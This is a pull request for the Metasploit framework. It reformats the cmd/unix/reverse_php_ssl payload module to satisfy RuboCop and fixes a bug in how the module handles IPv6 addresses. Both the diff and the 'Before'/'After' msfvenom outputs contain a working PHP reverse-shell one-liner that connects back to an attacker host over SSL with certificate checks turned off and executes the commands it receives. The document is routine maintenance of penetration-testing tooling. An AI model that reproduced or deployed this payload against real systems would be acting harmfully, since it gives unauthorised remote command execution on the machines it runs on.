### PR TITLE
payloads: cmd/unix/reverse_php_ssl: Resolve RuboCop violations

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
@@ -3,32 +3,32 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 module MetasploitModule
-
   CachedSize = 279
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
-    super(merge_info(info,
-     'Name'          => 'Unix Command Shell, Reverse TCP SSL (via php)',
-     'Description'   => 'Creates an interactive shell via php, uses SSL',
-     'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
-     'License'       => BSD_LICENSE,
-     'Platform'      => 'unix',
-     'Arch'          => ARCH_CMD,
-     'Handler'       => Msf::Handler::ReverseTcpSsl,
-     'Session'       => Msf::Sessions::CommandShell,
-     'PayloadType'   => 'cmd',
-     'RequiredCmd'   => 'php',
-     'Payload'       =>
-       {
-         'Offsets' => { },
-         'Payload' => ''
-       }
-    ))
+    super(
+      merge_info(
+        info,
+        'Name' => 'Unix Command Shell, Reverse TCP SSL (via php)',
+        'Description' => 'Creates an interactive shell via php, uses SSL',
+        'Author' => 'RageLtMan <rageltman[at]sempervictus>',
+        'License' => BSD_LICENSE,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Handler' => Msf::Handler::ReverseTcpSsl,
+        'Session' => Msf::Sessions::CommandShell,
+        'PayloadType' => 'cmd',
+        'RequiredCmd' => 'php',
+        'Payload' => {
+          'Offsets' => {},
+          'Payload' => ''
+        }
+      )
+    )
     register_advanced_options(
       [
         OptString.new('PHPPath', [true, 'The path to the PHP executable', 'php'])
@@ -48,9 +48,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    lhost = datastore['LHOST']
-    ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
-    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-    cmd = "#{datastore['PHPPath']} -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false,\"verify_peer_name\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
+    lhost = Rex::Socket.is_ipv6?(datastore['LHOST']) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
+    "#{datastore['PHPPath']} -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false,\"verify_peer_name\"=>false]]);while($s=@stream_socket_client(\"ssl://#{lhost}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
   end
 end


### PR DESCRIPTION
This PR fixes IPv6 support in the `cmd/unix/reverse_php_ssl` payload.

The module attempts to support IPv6 by setting the `lhost` variable appropriately, then ignores `lhost` and uses `datastore['LHOST']` instead:

https://github.com/rapid7/metasploit-framework/blob/809d87a96bfe51a2ca2a676386af81956da8a0eb/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb#L50-L55

RubpCop correctly identifies the unused `lhost` variable and attempts to autocorrect it, resulting in a `Lint/Void` violation. This PR also simultaneously resolves all RuboCop violations.


# Before

```
# ./msfvenom -p cmd/unix/reverse_php_ssl LHOST=::1
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 267 bytes
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://::1:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
```

# After

```
# ./msfvenom -p cmd/unix/reverse_php_ssl LHOST=::1
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 269 bytes
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://[::1]:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
```
